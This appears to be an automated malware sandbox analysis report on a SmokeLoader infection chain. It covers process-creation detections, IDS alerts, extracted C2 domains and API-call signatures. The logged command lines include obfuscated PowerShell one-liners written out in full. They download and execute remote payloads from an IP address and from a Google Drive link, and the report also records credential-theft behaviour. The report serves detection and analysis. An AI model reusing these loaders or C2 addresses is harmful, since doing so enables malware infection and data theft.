              Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zrs0mlof\zrs0mlof.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zrs0mlof\zrs0mlof.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\sYSTEM32\wIndowSpOWersHELl\v1.0\powerShELl.ExE" "pOWErSHell -Ex BypAsS -nOp -w 1 -c dEvicECrEDeNtIaldePLoyMenT.EXe ; iex($(IeX('[systEm.TeXt.eNcoDINg]'+[CHaR]58+[Char]0X3a+'utf8.geTsTRinG([sySteM.COnvErT]'+[CHar]58+[cHAr]58+'frOMBaSE64StRING('+[cHaR]34+'JDVnZ0U5NiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRW1iRXJERUZJbmlUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXUnQsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3d3osc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRXdqWU8sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcVN5cHZwZixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9vUGdpWGNPayk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJyIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWNremRUWnd6ZCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDVnZ0U5Njo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTM1LjE2Ni82MDAvc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbnN0b2ViZS50SUYiLCIkZU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMiLDAsMCk7c1RBUnQtc0xlRVAoMyk7c1RBcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMi'+[cHAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7848, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zrs0mlof\zrs0mlof.cmdline", ProcessId: 8152, ProcessName: csc.exe
              Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\wihaduv, CommandLine: C:\Users\user\AppData\Roaming\wihaduv, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\wihaduv, NewProcessName: C:\Users\user\AppData\Roaming\wihaduv, OriginalFileName: C:\Users\user\AppData\Roaming\wihaduv, ParentCommandLine: , ParentImage: , ParentProcessId: 1040, ProcessCommandLine: C:\Users\user\AppData\Roaming\wihaduv, ProcessId: 1556, ProcessName: wihaduv
              Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7848, TargetFilename: C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthign.vbS
              Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthign.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthign.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\sYSTEM32\wIndowSpOWersHELl\v1.0\powerShELl.ExE" "pOWErSHell -Ex BypAsS -nOp -w 1 -c dEvicECrEDeNtIaldePLoyMenT.EXe ; iex($(IeX('[systEm.TeXt.eNcoDINg]'+[CHaR]58+[Char]0X3a+'utf8.geTsTRinG([sySteM.COnvErT]'+[CHar]58+[cHAr]58+'frOMBaSE64StRING('+[cHaR]34+'JDVnZ0U5NiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRW1iRXJERUZJbmlUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXUnQsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3d3osc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRXdqWU8sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcVN5cHZwZixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9vUGdpWGNPayk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJyIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWNremRUWnd6ZCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDVnZ0U5Njo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTM1LjE2Ni82MDAvc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbnN0b2ViZS50SUYiLCIkZU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMiLDAsMCk7c1RBUnQtc0xlRVAoMyk7c1RBcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMi'+[cHAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7848, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthign.vbS" , ProcessId: 1384, ProcessName: wscript.exe
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7848, TargetFilename: C:\Users\user\AppData\Local\Temp\zrs0mlof\zrs0mlof.cmdline
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\sYSTEM32\wIndowSpOWersHELl\v1.0\powerShELl.ExE" "pOWErSHell -Ex BypAsS -nOp -w 1 -c dEvicECrEDeNtIaldePLoyMenT.EXe ; iex($(IeX('[systEm.TeXt.eNcoDINg]'+[CHaR]58+[Char]0X3a+'utf8.geTsTRinG([sySteM.COnvErT]'+[CHar]58+[cHAr]58+'frOMBaSE64StRING('+[cHaR]34+'JDVnZ0U5NiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRW1iRXJERUZJbmlUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXUnQsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3d3osc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRXdqWU8sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcVN5cHZwZixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9vUGdpWGNPayk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJyIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWNremRUWnd6ZCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDVnZ0U5Njo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTM1LjE2Ni82MDAvc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbnN0b2ViZS50SUYiLCIkZU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMiLDAsMCk7c1RBUnQtc0xlRVAoMyk7c1RBcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMi'+[cHAr]34+'))')))", CommandLine: "C:\Windows\sYSTEM32\wIndowSpOWersHELl\v1.0\powerShELl.ExE" "pOWErSHell -Ex BypAsS -nOp -w 1 -c dEvicECrEDeNtIaldePLoyMenT.EXe ; iex($(IeX('[systEm.TeXt.eNcoDINg]'+[CHaR]58+[Char]0X3a+'utf8.geTsTRinG([sySteM.COnvErT]'+[CHar]58+[cHAr]58+'frOMBaSE64StRING('+[cHaR]34+'JDVnZ0U5NiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRW1iRXJERUZJbmlUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXUnQsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3d3osc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRXdqWU8sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcVN5cHZwZixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9vUGdpWGNPayk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgI
              Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex ( (('hyximageUrl = QLehttps://drive.goo'+'gle.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur QLe;hyxwebClient = New-Ob'+'ject '+'Syste'+'m.Net.WebClie'+'nt;hyximageBytes = hyxwebClient.Dow'+'nloadD'+'ata(hyximageUrl);hyximageText = [System.Text.Encoding]::UTF8.GetString(hyximageBytes);hyxstartFlag = QLe<<BASE6'+'4_START>>QLe;hyxendFlag = QLe<<BASE64_END>>QLe;hyxstartIndex = hyxim'+'ageText.IndexOf(hyxstartFlag);hyxendIndex = hyximageText.IndexOf(hyxendFlag);hyxstartIndex -ge 0 -and hyxendIndex -gt hyxstartIndex;hyxstartIndex += hyxstartFlag.Length;hyxbase64Length = hyxendI'+'ndex - hyxstartIndex;hyxb'+'ase64Command = hyximageText.Substring(hyxstartIndex, hyxbase64Length);hyxbase64Reversed = -join (hyxba'+'se64Command.ToCha'+'rArray() VJ9 ForEach-Object { hyx_ })[-1'+'..-(hyxbase64Command.Length)];hyxcommandByt'+'es = [System.Convert]::FromBase64String(hyxbase64Reversed);hyxloadedAssembly = [System.Reflection.Assembly'+']::Load('+'hyxcommandByte'+'s);hyxvaiMethod = [d'+'nlib.IO.Home].GetMeth'+'od(QLeVAIQLe);hyxvaiMethod.Invoke(hyxnull, @(QLetxt.EECFRE/006/661.531.542.271//:ptthQLe, QLedesativadoQLe, QLedesativad'+'oQLe'+', QLedesativadoQLe, QLeasp'+'net_regbrowsersQLe, QLedesativadoQLe, QLedesativadoQLe,QLedesativadoQLe,QLedesativadoQLe,QLede'+'sat'+'ivadoQLe,QLedesati'+'vadoQLe,QLedesativadoQLe,QLe1QLe,QLedesativadoQLe));')-crEpLACE ([chAr]104+[chAr]121+[chAr]120),[chAr]36 -rEPLaCe([chAr]81+[chAr]76+[chAr]101),[chAr]39 -rEPLaCe'VJ9',[chAr]124))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex ( (('hyximageUrl = QLehttps://drive.goo'+'gle.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur QLe;hyxwebClient = New-Ob'+'ject '+'Syste'+'m.Net.WebClie'+'nt;hyximageBytes = hyxwebClient.Dow'+'nloadD'+'ata(hyximageUrl);hyximageText = [System.Text.Encoding]::UTF8.GetString(hyximageBytes);hyxstartFlag = QLe<<BASE6'+'4_START>>QLe;hyxendFlag = QLe<<BASE64_END>>QLe;hyxstartIndex = hyxim'+'ageText.IndexOf(hyxstartFlag);hyxendIndex = hyximageText.IndexOf(hyxendFlag);hyxstartIndex -ge 0 -and hyxendIndex -gt hyxstartIndex;hyxstartIndex += hyxstartFlag.Length;hyxbase64Length = hyxendI'+'ndex - hyxstartIndex;hyxb'+'ase64Command = hyximageText.Substring(hyxstartIndex, hyxbase64Length);hyxbase64Reversed = -join (hyxba'+'se64Command.ToCha'+'rArray() VJ9 ForEach-Object { hyx_ })[-1'+'..-(hyxbase64Command.Length)];hyxcommandByt'+'es = [System.Convert]::FromBase64String(hyxbase64Reversed);hyxloadedAssembly = [System.Reflection.Assembly'+']::Load('+'hyxcommandByte'+'s);hyxvaiMethod = [d'+'nlib.IO.Home].GetMeth'+'od(QLeVAIQLe);hyxvaiMethod.Invoke(hyxnull, @(QLetxt.EECFRE/006/661.531.542.271//:ptthQLe, QLedesativadoQLe, QLedesativad'+'oQLe'+', QLedesativadoQLe, QLeasp'+'net_regbrowsersQLe, QLedesativadoQLe, QLedesativad

              Data Obfuscation

              barindex
              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zrs0mlof\zrs0mlof.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zrs0mlof\zrs0mlof.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\sYSTEM32\wIndowSpOWersHELl\v1.0\powerShELl.ExE" "pOWErSHell -Ex BypAsS -nOp -w 1 -c dEvicECrEDeNtIaldePLoyMenT.EXe ; iex($(IeX('[systEm.TeXt.eNcoDINg]'+[CHaR]58+[Char]0X3a+'utf8.geTsTRinG([sySteM.COnvErT]'+[CHar]58+[cHAr]58+'frOMBaSE64StRING('+[cHaR]34+'JDVnZ0U5NiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRW1iRXJERUZJbmlUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXUnQsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3d3osc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRXdqWU8sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcVN5cHZwZixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9vUGdpWGNPayk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJyIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWNremRUWnd6ZCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDVnZ0U5Njo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTM1LjE2Ni82MDAvc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbnN0b2ViZS50SUYiLCIkZU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMiLDAsMCk7c1RBUnQtc0xlRVAoMyk7c1RBcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMi'+[cHAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7848, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zrs0mlof\zrs0mlof.cmdline", ProcessId: 8152, ProcessName: csc.exe
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-23T08:15:00.290944+020020490381A Network Trojan was detected142.250.185.193443192.168.2.1049778TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-23T08:15:42.990854+020020391031A Network Trojan was detected192.168.2.104998045.91.8.15280TCP
              2024-10-23T08:15:48.908087+020020391031A Network Trojan was detected192.168.2.104998145.91.8.15280TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-23T08:15:43.287323+020028298482Potentially Bad Traffic45.91.8.15280192.168.2.1049980TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: 0000000D.00000002.1778514490.0000000000DB0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://prolinice.ga/index.php", "http://vilendar.ga/index.php"]}
              Source: prolinice.gaVirustotal: Detection: 11%Perma Link
              Source: veryeasythingsevermadeforcreatenewthignsbetterthigns.htaReversingLabs: Detection: 18%
              Source: veryeasythingsevermadeforcreatenewthignsbetterthigns.htaVirustotal: Detection: 27%Perma Link
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_02973098 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,CryptUnprotectData,DeleteFileW,19_2_02973098
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_02973717 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,CryptUnprotectData,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,lstrlen,DeleteFileW,19_2_02973717
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_02973E04 RtlCompareMemory,CryptUnprotectData,19_2_02973E04
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_0297123B lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,19_2_0297123B
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_02971198 CryptBinaryToStringA,CryptBinaryToStringA,19_2_02971198
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_029711E1 lstrcmpiW,lstrlenW,CryptStringToBinaryW,CryptStringToBinaryW,CryptStringToBinaryW,19_2_029711E1
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_02971FCE CryptUnprotectData,RtlMoveMemory,19_2_02971FCE
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 21_2_032026AC lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,21_2_032026AC
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_02C2178C lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,22_2_02C2178C
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_02C2118D CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,22_2_02C2118D
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_02A2263E CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,24_2_02A2263E
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_02A22404 lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,24_2_02A22404
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_02A2245E lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,24_2_02A2245E
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 30_2_00152799 CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,30_2_00152799
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 30_2_001525A4 CryptBinaryToStringA,CryptBinaryToStringA,30_2_001525A4
              Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.10:49772 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.10:49778 version: TLS 1.2
              Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1330054592.0000000007610000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 0000000A.00000002.1749720181.0000000007210000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1700046832.00000000046AA000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1330430112.0000000007691000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: aspnet_regbrowsers.pdb source: wihaduv, 00000011.00000000.1938334004.0000000000C52000.00000002.00000001.01000000.0000000C.sdmp, wihaduv.14.dr
              Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 0000000A.00000002.1749720181.0000000007210000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1700046832.00000000046AA000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: aspnet_regbrowsers.pdbl source: wihaduv, 00000011.00000000.1938334004.0000000000C52000.00000002.00000001.01000000.0000000C.sdmp, wihaduv.14.dr
              Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 0000000A.00000002.1749720181.0000000007210000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1700046832.00000000046AA000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: q6C:\Users\user\AppData\Local\Temp\zrs0mlof\zrs0mlof.pdb source: powershell.exe, 00000001.00000002.1442591521.0000000004D6E000.00000004.00000800.00020000.00000000.sdmp
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_02972B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,19_2_02972B15
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_02973ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,19_2_02973ED9
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_02971D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,19_2_02971D4A
              Source: C:\Windows\explorer.exeCode function: 20_2_00FD30A8 FindFirstFileW,FindNextFileW,FindClose,20_2_00FD30A8
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 21_2_0320255C lstrcatW,PathAppendW,FindFirstFileW,RtlZeroMemory,lstrcatW,PathAppendW,lstrcatW,PathAppendW,StrStrIW,FindNextFileW,FindClose,21_2_0320255C
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_02C214D8 wsprintfW,FindFirstFileW,wsprintfW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,22_2_02C214D8
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_02C213FE wsprintfW,FindFirstFileW,wsprintfW,RemoveDirectoryW,FindNextFileW,FindClose,22_2_02C213FE
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_02C215BE RtlZeroMemory,SHGetSpecialFolderPathW,lstrcatW,PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,PathCombineW,PathMatchSpecW,PathCombineW,FindNextFileW,FindClose,22_2_02C215BE
              Source: C:\Windows\explorer.exeCode function: 23_2_00A01DB0 FindFirstFileW,FindNextFileW,FindClose,23_2_00A01DB0
              Source: C:\Windows\explorer.exeCode function: 23_2_00A01EB4 FindFirstFileW,FindNextFileW,FindClose,23_2_00A01EB4
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
